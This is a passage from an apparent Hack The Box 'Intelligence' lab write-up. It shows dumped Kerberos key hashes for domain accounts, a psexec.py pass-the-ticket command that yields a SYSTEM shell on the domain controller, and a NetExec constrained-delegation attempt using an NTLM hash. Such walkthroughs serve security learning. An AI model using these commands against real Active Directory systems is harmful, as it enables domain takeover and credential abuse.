intelligence.htb\Laura.Lee:aes128-cts-hmac-sha1-96:2f6b685dbe4a2ab6dba9caf12cc6dfcd
intelligence.htb\Laura.Lee:des-cbc-md5:6b25230d340292e6
intelligence.htb\Ted.Graves:aes256-cts-hmac-sha1-96:6907d00169d3f89abd23c79b51faee5dd59c591c8fec2558f83015fac59d407a
intelligence.htb\Ted.Graves:aes128-cts-hmac-sha1-96:fb439de8ecc244dcbd303248227bb9d0
intelligence.htb\Ted.Graves:des-cbc-md5:57bf52aba4f757a1
DC$:aes256-cts-hmac-sha1-96:8bc331a9b7be56c2ee547e0405fafc4558be6af3f2da0300248359c550f3a5ee
DC$:aes128-cts-hmac-sha1-96:ce1489d68747be4cbeb7036067a6ef0a
DC$:des-cbc-md5:68f1fdd5f12a682a
svc_int$:aes256-cts-hmac-sha1-96:13e30243822cc7540f660c3f53eabab0b22fee43503dc9b52a760c8309b2ab3c
svc_int$:aes128-cts-hmac-sha1-96:472b1fa3589aed96333772ce3d620bae
svc_int$:des-cbc-md5:23bff49e7c6de6c8
[*] Cleaning up... 
```

We can also use `psexec.py` to obtain a shell as system:

```console
opcode@debian$ export KRB5CCNAME=`pwd`/Administrator.ccache
opcode@debian$ psexec.py intelligence.htb/Administrator@dc.intelligence.htb -no-pass -k
Impacket v0.12.0.dev1+20231012.22017.2de29184 - Copyright 2023 Fortra

[*] Requesting shares on dc.intelligence.htb.....
[*] Found writable share ADMIN$
[*] Uploading file EWFfwNtm.exe
[*] Opening SVCManager on dc.intelligence.htb.....
[*] Creating service wciu on dc.intelligence.htb.....
[*] Starting service wciu.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.1879]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system
```

Recently, a feature to automatically abuse `Constrained Delegation with Protocol Transition` was added to `NetExec`.  
We can try that as well:

```console
root@8090a585010c:~# nxc smb 10.10.10.248 -d intelligence.htb -u 'svc_int$' -H '6c986cdcb965f2607f894fb257417f8e' --delegate Administrator
SMB         10.10.10.248    445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:intelligence.htb) (signing:True) (SMBv1:False)
SMB         10.10.10.248    445    DC               [-] intelligence.htb\Administrator through S4U with svc_int$ KDC_ERR_BADOPTION 
```

It did not work on this box.
